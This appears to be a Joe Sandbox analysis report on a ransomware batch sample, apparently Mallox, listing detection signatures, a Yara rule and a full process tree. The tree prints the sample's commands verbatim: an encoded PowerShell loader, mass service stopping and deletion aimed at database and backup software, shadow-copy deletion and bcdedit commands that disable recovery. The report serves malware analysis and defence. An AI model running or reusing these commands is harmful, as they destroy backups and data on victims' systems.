Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
R1TftmQpuQ.bat

Overview

General Information

Sample name:R1TftmQpuQ.bat
renamed because original name is a hash value
Original sample name:3B8A2BCD9E8DD805793CC95C74D30F20EBC5714EA249D165AFAC29D1F3B0ACE0.bat
Analysis ID:1611767
MD5:659dc2c8af5180c5465f0e04e7334aed
SHA1:a3e075c9d36c0077471f7034696af4c660630d9b
SHA256:3b8a2bcd9e8dd805793cc95c74d30f20ebc5714ea249d165afac29d1f3b0ace0
Tags:batuser-lighting9999
Infos:

Detection

Targeted Ransomware
Score:100
Range:0 - 100
Confidence:100%

Signatures

Found ransom note / readme
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Kill multiple process
Sigma detected: Stop multiple services
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected RansomwareGeneric
Yara detected Targeted Ransomware
.NET source code contains potential unpacker
Creates files in the recycle bin to hide itself
Deletes shadow drive data (may be related to ransomware)
Disables security and backup related services
Encrypted powershell cmdline option found
Excessive usage of taskkill to terminate processes
Found large BAT file
Joe Sandbox ML detected suspicious sample
May disable shadow drive data (uses vssadmin)
Opens network shares
Powershell is started from unusual location (likely to bypass HIPS)
Reads the Security eventlog
Reads the System eventlog
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Shadow Copies Deletion Using Operating Systems Utilities
Sigma detected: Silenttrinity Stager Msbuild Activity
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious Executable File Creation
Sigma detected: Suspicious Windows Service Tampering
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses attrib.exe to hide files
Uses bcdedit to modify the Windows boot settings
Writes a notice file (html or txt) to demand a ransom
Writes many files with high entropy
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for available system drives (often done to infect USB drives)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
Sigma detected: Suspicious Execution of Powershell with Base64
Stores files to the Windows start menu directory
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses net.exe to stop services
Uses taskkill to terminate processes
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • cmd.exe (PID: 6204 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\R1TftmQpuQ.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 5892 cmdline: attrib +s +h "C:\Users\user\Desktop\R1TftmQpuQ.bat".exe MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
    • R1TftmQpuQ.bat.exe (PID: 5664 cmdline: "C:\Users\user\Desktop\R1TftmQpuQ.bat".exe -wIn 1 -enC JABlAHgAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0AFAAcgBvAGMAZQBzAHMAKAApAC4ATQBhAGkAbgBNAG8AZAB1AGwAZQAuAEYAaQBsAGUATgBhAG0AZQA7ACAAJABsAGUAbgAgAD0AIAAkAGUAeABlAC4ATABlAG4AZwB0AGgAOwAkAGwAZQBuACAAPQAgACQAbABlAG4AIAAtACAANAA7ACQAVwBlAGIAVABpAHQAbABlACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAFMAdAByAGkAbgBnAEIAdQBpAGwAZABlAHIAOwAgAGYAbwByAGUAYQBjAGgAIAAoACQAbABpAG4AZQAgAGkAbgAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQATABpAG4AZQBzACgAJABlAHgAZQAuAFIAZQBtAG8AdgBlACgAJABsAGUAbgApACkAKQAgAHsAIABpAGYAIAAoACQAbABpAG4AZQAgAC0AbABpAGsAZQAgACcAKgAgAK4AKgAnACkAIAB7ACAAIAAkAFcAZQBiAFQAaQB0AGwAZQAuAEEAcABwAGUAbgBkACgAJABsAGkAbgBlAC4AUwBwAGwAaQB0ACgAJwCuACcAKQBbADEAXQApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAB9ACAAfQA7ACAAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAVwBlAGIAVABpAHQAbABlAC4AVABvAFMAdAByAGkAbgBnACgAKQApADsAJABpAG4AcAB1AHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAGIAeQB0AGUAcwAgACkAOwAkAG8AdQB0AHAAdQB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtADsAJABnAHoAaQBwAFMAdAByAGUAYQBtACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAGkAbgBwAHUAdAAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAZwB6AGkAcABTAHQAcgBlAGEAbQAuAEMAbwBwAHkAVABvACgAIAAkAG8AdQB0AHAAdQB0ACAAKQA7ACQAZwB6AGkAcABTAHQAcgBlAGEAbQAuAEMAbABvAHMAZQAoACkAOwAkAGkAbgBwAHUAdAAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAGIAeQB0AGUAcwAgAD0AIAAkAG8AdQB0AHAAdQB0AC4AVABvAEEAcgByAGEAeQAoACkAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABiAHkAdABlAHMAKQA7ACAAJABhAHMAcwBlAG0AYgBsAHkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgB5AHQAZQBzACkAOwAgACQAZQBuAHQAcgB5AFAAbwBpAG4AdABNAGUAdABoAG8AZAAgAD0AIAAkAGEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAcwAoACkALgBXAGgAZQByAGUAKAB7ACAAJABfAC4ATgBhAG0AZQAgAC0AZQBxACAAJwBXAHIAZwB2AGcAcAByACcAIAB9ACwAIAAnAEYAaQByAHMAdAAnACkALgBHAGUAdABNAGUAdABoAG8AZAAoACcATQBhAGkAbgAnACwAIABbAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBCAGkAbgBkAGkAbgBnAEYAbABhAGcAcwBdACAAJwBTAHQAYQB0AGkAYwAsACAAUAB1AGIAbABpAGMALAAgAE4AbwBuAFAAdQBiAGwAaQBjACcAKQA7ACAAJABlAG4AdAByAHkAUABvAGkAbgB0AE0AZQB0AGgAbwBkAC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA= MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • powershell.exe (PID: 5680 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA== MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 5332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7144 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Bwmeldokiller.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 6780 cmdline: cmd /c "color b & net stop "SQLSERVERAGENT" & net stop "SQLBrowser" & net stop "SQLTELEMETRY" & net stop "MsDtsServer130" & net stop "SSISTELEMETRY130" & net stop "SQLWrite" & net stop "MSSQL$VEEAMSQL2012" & net stop "SQLAgent$VEEAMSQL2012" & net stop "MSSQL" & net stop "SQLAgent" & net stop "MSSQLServerADHelper100" & net stop "MSSQLServerOLAPService" & net stop "MsDtsServer100" & net stop "ReportServer" & net stop "SQLTELEMETRY$HL" & net stop "TMBMServer" & net stop "MSSQL$PROGID" & net stop "MSSQL$WOLTERSKLUWER" & net stop "SQLAgent$PROGID" & net stop "SQLAgent$WOLTERSKLUWER" & net stop "MSSQLFDLauncher$OPTIMA" & net stop "MSSQL$OPTIMA" & net stop "SQLAgent$OPTIMA" & net stop "ReportServer$OPTIMA" & net stop "msftesql$SQLEXPRESS" & net stop "postgresql-x64-9.4" & sc config "MSSQLFDLauncher" start= disabled & sc config "SQLSERVERAGENT" start= disabled & sc config "SQLBrowser" start= disabled" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 5068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • net.exe (PID: 6708 cmdline: net stop "SQLSERVERAGENT" MD5: 31890A7DE89936F922D44D677F681A7F)
            • net1.exe (PID: 5020 cmdline: C:\Windows\system32\net1 stop "SQLSERVERAGENT" MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
          • net.exe (PID: 7304 cmdline: net stop "SQLBrowser" MD5: 31890A7DE89936F922D44D677F681A7F)
            • net1.exe (PID: 7408 cmdline: C:\Windows\system32\net1 stop "SQLBrowser" MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
          • net.exe (PID: 7616 cmdline: net stop "SQLTELEMETRY" MD5: 31890A7DE89936F922D44D677F681A7F)
            • net1.exe (PID: 7668 cmdline: C:\Windows\system32\net1 stop "SQLTELEMETRY" MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
        • cmd.exe (PID: 2224 cmdline: cmd /c "color b & sc config MSSQLSERVER start=disabled & sc config "SQL Server (MSSQLSERVER)" start=disabled & net stop MSSQL$ & sc config MSSQL$ start=disabled & net stop SQLSERVERAGENT & sc config SQLSERVERAGENT start=disabled & net stop SQLBrowser & sc config SQLBrowser start=disabled & net stop vss & sc config vss start=disabled & net stop SQLWriter & sc config SQLWriter start=disabled & net stop vmvss & sc config vmvss start=disabled & sc config MSSQL$FE_EXPRESS start= disabled & net stop MSSQL$RE_EXPRESS & net stop SQLANYs_Sage_FAS_Fixed_Assets & sc config SQLANYs_Sage_FAS_Fixed_Assets start=disabled & net stop MSSQL$VIM_SQLEXP & sc config MSSQL$VIM_SQLEXP start=disabled & net stop "MSSQLFDLauncher" & net stop "MSSQLSERVER"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 1708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • sc.exe (PID: 7172 cmdline: sc config MSSQLSERVER start=disabled MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
          • sc.exe (PID: 7340 cmdline: sc config "SQL Server (MSSQLSERVER)" start=disabled MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
          • net.exe (PID: 7488 cmdline: net stop MSSQL$ MD5: 31890A7DE89936F922D44D677F681A7F)
            • net1.exe (PID: 7564 cmdline: C:\Windows\system32\net1 stop MSSQL$ MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
          • sc.exe (PID: 7796 cmdline: sc config MSSQL$ start=disabled MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
          • net.exe (PID: 7940 cmdline: net stop SQLSERVERAGENT MD5: 31890A7DE89936F922D44D677F681A7F)
            • net1.exe (PID: 8008 cmdline: C:\Windows\system32\net1 stop SQLSERVERAGENT MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
              • Conhost.exe (PID: 6284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 1968 cmdline: cmd /c "color b & taskkill /F /IM Veeam.Backup.Agent.ConfigurationService.exe & taskkill /F /IM Veeam.Backup.BrokerService.exe & taskkill /F /IM Veeam.Backup.CatalogDataService.exe & taskkill /F /IM Veeam.Backup.CloudService.exe & taskkill /F /IM Veeam.Backup.Manager.exe & taskkill /F /IM Veeam.Backup.MountService.exe & taskkill /F /IM Veeam.Backup.Service.exe & taskkill /F /IM Veeam.Backup.WmiServer.exe & taskkill /F /IM Veeam.Guest.Interaction.Proxy.exe & taskkill /F /IM VeeamDeploymentSvc.exe & taskkill /F /IM VeeamNFSSvc.exe & taskkill /F /IM VeeamTransportSvc.exe & taskkill /F /IM sqlbrowser.exe & taskkill /F /IM sqlceip.exe & taskkill /F /IM sqlservr.exe & taskkill /F /IM sqlwriter.exe & taskkill /F /IM sqlagentc.exe & taskkill /F /IM ReportingServicesService.exe & taskkill /F /IM Ssms.exe & taskkill /F /IM fdhost.exe & taskkill /F /IM fdlauncher.exe & taskkill /F /IM MsDtsSrvr.exe & taskkill /F /IM msmdsrv.exe & taskkill /F /IM mysql.exe & taskkill /F /IM mysqld.exe & taskkill /F /IM w3wp.exe & taskkill /F /IM wsusservice.exe & taskkill /F /IM SageCSClient.exe & taskkill /F /IM UFSoft.U8.OC.QuartzScheduler.exe & taskkill /F /IM Launchpad.exe & taskkill /F /IM dbsrv12.exe & taskkill /F /IM EXCEL.EXE & taskkill /F /IM OUTLOOK.EXE & taskkill /F /IM WINWORD.EXE & taskkill /F /IM OneDrive.exe & taskkill /F /IM TaskService.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 1804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • taskkill.exe (PID: 5292 cmdline: taskkill /F /IM Veeam.Backup.Agent.ConfigurationService.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
          • taskkill.exe (PID: 7432 cmdline: taskkill /F /IM Veeam.Backup.BrokerService.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
          • taskkill.exe (PID: 7788 cmdline: taskkill /F /IM Veeam.Backup.CatalogDataService.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
          • taskkill.exe (PID: 8032 cmdline: taskkill /F /IM Veeam.Backup.CloudService.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
            • Conhost.exe (PID: 7216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 2268 cmdline: cmd /c "color b & net stop "MSOLAP$SHOPCONTROL9" & net stop "MSSQL$SHOPCONTROL9" & net stop "MSSQLFDLauncher$SHOPCONTROL9" & net stop "ReportServer$SHOPCONTROL9" & net stop "SQLAgent$SHOPCONTROL9" & net stop "NetBackup Client Service" & net stop "NetBackup Discovery Framework" & net stop "NetBackup Legacy Client Service" & net stop "NetBackup Legacy Network Service" & net stop "NetBackup Proxy Service" & net stop "NetBackup SAN Client Fibre Transport Service" & taskkill /IM mysqld-nt.exe /F & taskkill /IM NFVPrint.exe /F & taskkill /IM licenceserver.exe /F & taskkill /IM Launchpad.exe /F & taskkill /F /IM "FileZilla Server.exe" & taskkill /F /IM cbService.exe & taskkill /F /IM cbInterface.exe & taskkill /F /IM pvxwin32.exe & taskkill /F /IM pvxwin64.exe & taskkill /F /IM pvxcom.exe & taskkill /F /IM pvxiosvr.exe & taskkill /F /IM Sage.NA.AT_AU.SysTray.exe & taskkill /F /IM Sage.NA.AT_AU.Service.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • net.exe (PID: 7320 cmdline: net stop "MSOLAP$SHOPCONTROL9" MD5: 31890A7DE89936F922D44D677F681A7F)
            • net1.exe (PID: 7380 cmdline: C:\Windows\system32\net1 stop "MSOLAP$SHOPCONTROL9" MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
          • net.exe (PID: 7632 cmdline: net stop "MSSQL$SHOPCONTROL9" MD5: 31890A7DE89936F922D44D677F681A7F)
            • net1.exe (PID: 7696 cmdline: C:\Windows\system32\net1 stop "MSSQL$SHOPCONTROL9" MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
          • net.exe (PID: 8000 cmdline: net stop "MSSQLFDLauncher$SHOPCONTROL9" MD5: 31890A7DE89936F922D44D677F681A7F)
            • net1.exe (PID: 8052 cmdline: C:\Windows\system32\net1 stop "MSSQLFDLauncher$SHOPCONTROL9" MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
        • cmd.exe (PID: 7284 cmdline: cmd /c "color b & @taskkill /IM Tomcat7w.exe /F & @taskkill /IM "UFSoft.U8.OC.QuartzScheduler.exe" /F & @taskkill /IM UFSoft.U8.OC.QuartzScheduler.exe /F & @taskkill /IM Launchpad.exe /F & @taskkill /IM mpdwsvc.exe /F & @taskkill /IM cbVSCService11.exe /F & @taskkill /IM cbService.exe /F & @sc delete CobianBackup11 & @sc delete cbVSCService11 & @taskkill /IM mysqld-nt.exe /F & @taskkill /IM "Kingdee.K3.CRM.MMC.AutoService.exe" /F & @taskkill /IM sqlceip.exe /F & @taskkill /IM "Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe" /F & taskkill /F /IM store.exe & taskkill /F /IM MSExchangeMailboxReplication.exe & taskkill /F /IM Microsoft.Exchange.ProtectedServiceHost.exe & taskkill /F /IM MSExchangeThrottling.exe & taskkill /F /IM EdgeTransport.exe & taskkill /F /IM MSExchangeTransportLogSearch.exe & taskkill /F /IM Microsoft.Exchange.RpcClientAccess.Service.exe & taskkill /F /IM Microsoft.Exchange.AddressBook.Service.exe & taskkill /F /IM DataCollectorSvc.exe & taskkill /F /IM Microsoft.Exchange.ServiceHost.exe & taskkill /F /IM Microsoft.Exchange.ContentFilter.Wrapper.exe & taskkill /F /IM MSExchangeMailboxAssistants.exe & taskkill /F /IM msexchangerepl.exe & taskkill /F /IM Microsoft.Exchange.Search.ExSearch.exe & taskkill /F /IM Microsoft.Exchange.EdgeSyncSvc.exe & taskkill /F /IM MsExchangeFDS.exe & taskkill /F /IM MSExchangeMailSubmission.exe & taskkill /F /IM MSExchangeTransport.exe & taskkill /F /IM Microsoft.Exchange.AntispamUpdateSvc.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • taskkill.exe (PID: 7520 cmdline: taskkill /IM Tomcat7w.exe /F MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
          • taskkill.exe (PID: 7852 cmdline: taskkill /IM "UFSoft.U8.OC.QuartzScheduler.exe" /F MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
        • cmd.exe (PID: 7472 cmdline: cmd /c "color b & @taskkill /IM DDSoftPwsTomcat9.exe /F & @taskkill /IM U8SmartClient.exe /F & @taskkill /IM U8SmartClientMonitor.exe /F & @taskkill /IM tomcat9.exe /F & @taskkill /IM SqlManagement.exe /F & @sc delete "SiebelApplicationContainer_Siebel_Home_d_Siebel_sai" & @taskkill /IM ReportingServicesService.exe /F & @sc delete "ReportServer$SQLEXPRESS" & @sc delete TongBackupSrv & @taskkill /IM TongBackupSrv.exe /F & @taskkill /IM UFMsgCenterService.exe /F & @taskkill /IM "Cobian.exe" /F & @taskkill /IM "SAP Business One.exe" /F & @net stop "SQLBackupAndFTP Client Service" & @taskkill /IM "SqlBak.Service.exe" /F & @net stop cbVSCService & @net stop "SAP Business One RSP Agent Service" & @net stop SAPB1iDIProxy & @net stop "SAPB1iDIProxy_Monitor" & @net stop SAPB1iEventSender & @net stop SBOClientAgent & @net stop SBODI_Server & @net stop SBOJobServiceBackEnd & @net stop SBOMail & @net stop SBOWFDataAccess & @net stop SBOWorkflowuser" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • taskkill.exe (PID: 7684 cmdline: taskkill /IM DDSoftPwsTomcat9.exe /F MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
          • taskkill.exe (PID: 8016 cmdline: taskkill /IM U8SmartClient.exe /F MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
        • cmd.exe (PID: 7716 cmdline: cmd /c "color b & @sc delete "XT800Service_Personal" & @sc delete SQLSERVERAGENT & @sc delete SQLWriter & @sc delete SQLBrowser & @sc delete MSSQLFDLauncher & @sc delete MSSQLSERVER & @sc delete QcSoftService & @sc delete MSSQLServerOLAPService & @sc delete VMTools & @sc delete VGAuthService & @sc delete MSDTC & @sc delete TeamViewer & @sc delete ReportServer & @sc delete RabbitMQ & @sc delete "AHS SERVICE" & @sc delete "Sense Shield Service" & @sc delete SSMonitorService & @sc delete SSSyncService & @sc delete TPlusStdAppService1300 & @sc delete MSSQL$SQL2008 & @sc delete SQLAgent$SQL2008 & @sc delete TPlusStdTaskService1300 & @sc delete TPlusStdUpgradeService1300 & @sc delete VirboxWebServer & @sc delete jhi_service & @sc delete LMS & @sc delete "FontCache3.0.0.0" & @sc delete "OSP Service"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • sc.exe (PID: 7888 cmdline: sc delete "XT800Service_Personal" MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
        • cmd.exe (PID: 7872 cmdline: cmd /c "color b & @sc delete "DAService_TCP" & @sc delete "eCard-TTransServer" & @sc delete eCardMPService & @sc delete EnergyDataService & @sc delete UI0Detect & @sc delete K3MobileService & @sc delete TCPIDDAService & @sc delete WebAttendServer & @sc delete UIODetect & @sc delete "wanxiao-monitor" & @sc delete VMAuthdService & @sc delete VMUSBArbService & @sc delete VMwareHostd & @sc delete "vm-agent" & @sc delete VmAgentDaemon & @sc delete OpenSSHd & @sc delete eSightService & @sc delete apachezt & @sc delete Jenkins & @sc delete secbizsrv & @sc delete SQLTELEMETRY & @sc delete MSMQ & @sc delete smtpsvrJT & @sc delete zyb_sync & @sc delete 360EntHttpServer & @sc delete 360EntSvc & @sc delete 360EntClientSvc & @sc delete NFWebServer & @sc delete wampapache & @sc delete MSSEARCH & @sc delete msftesql & @sc delete "SyncBASE Service" & @sc delete OracleDBConcoleorcl & @sc delete OracleJobSchedulerORCL & @sc delete OracleMTSRecoveryService" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 8076 cmdline: cmd /c "color b & @sc delete OracleOraDb11g_home1ClrAgent & @sc delete OracleOraDb11g_home1TNSListener & @sc delete OracleVssWriterORCL & @sc delete OracleServiceORCL & @sc delete aspnet_state @sc delete Redis & @sc delete OracleVssWriterORCL & @sc delete JhTask & @sc delete ImeDictUpdateService & @sc delete XT800Service_Personal & @sc delete MCService & @sc delete ImeDictUpdateService & @sc delete allpass_redisservice_port21160 & @sc delete "Flash Helper Service" & @sc delete "Kiwi Syslog Server" & @sc delete "UWS HiPriv Services" & net stop MSSQL$FE_EXPRESS" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • MSBuild.exe (PID: 6028 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
        • vssadmin.exe (PID: 5968 cmdline: "C:\Windows\sysnative\vssadmin.exe" delete shadows /all /quiet MD5: B58073DB8892B67A672906C9358020EC)
          • conhost.exe (PID: 5376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 5112 cmdline: "C:\Windows\System32\cmd.exe" /C sc delete "MSSQLFDLauncher"&&sc delete "MSSQLSERVER"&&sc delete "SQLSERVERAGENT"&&sc delete "SQLBrowser"&&sc delete "SQLTELEMETRY"&&sc delete "MsDtsServer130"&&sc delete "SSISTELEMETRY130"&&sc delete "SQLWriter"&&sc delete "MSSQL$VEEAMSQL2012"&&sc delete "SQLAgent$VEEAMSQL2012"&&sc delete "MSSQL"&&sc delete "SQLAgent"&&sc delete "MSSQLServerADHelper100"&&sc delete "MSSQLServerOLAPService"&&sc delete "MsDtsServer100"&&sc delete "ReportServer"&&sc delete "SQLTELEMETRY$HL"&&sc delete "TMBMServer"&&sc delete "MSSQL$PROGID"&&sc delete "MSSQL$WOLTERSKLUWER"&&sc delete "SQLAgent$PROGID"&&sc delete "SQLAgent$WOLTERSKLUWER"&&sc delete "MSSQLFDLauncher$OPTIMA"&&sc delete "MSSQL$OPTIMA"&&sc delete "SQLAgent$OPTIMA"&&sc delete "ReportServer$OPTIMA"&&sc delete "msftesql$SQLEXPRESS"&&sc delete "postgresql-x64-9.4"&&rem Kill "SQL"&&taskkill -f -im sqlbrowser.exe&&taskkill -f -im sqlwriter.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im msmdsrv.exe&&taskkill -f -im MsDtsSrvr.exe&&taskkill -f -im sqlceip.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im Ssms.exe&&taskkill -f -im SQLAGENT.EXE&&taskkill -f -im fdhost.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im ReportingServicesService.exe&&taskkill -f -im msftesql.exe&&taskkill -f -im pg_ctl.exe&&taskkill -f -im postgres.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 2632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • sc.exe (PID: 3928 cmdline: sc delete "MSSQLFDLauncher" MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
        • cmd.exe (PID: 4600 cmdline: "C:\Windows\System32\cmd.exe" /c bcdedit /set {current} bootstatuspolicy ignoreallfailures MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 3884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 4068 cmdline: "C:\Windows\System32\cmd.exe" /c bcdedit /set {current} recoveryenabled no MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
0000000A.00000002.3352660779.0000000000400000.00000040.00000400.00020000.00000000.sdmpransomware_malloxRule to detect mallox ransomware samples.Sekoia.io
  • 0x1fffc:$s1: C:\HOW TO RECOVER !!.TXT
  • 0x1f9c8:$s2: SYSTEM\CurrentControlSet\Services\EventLog\Application\Raccine
  • 0x1fa48:$s3: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vssadmin.exe
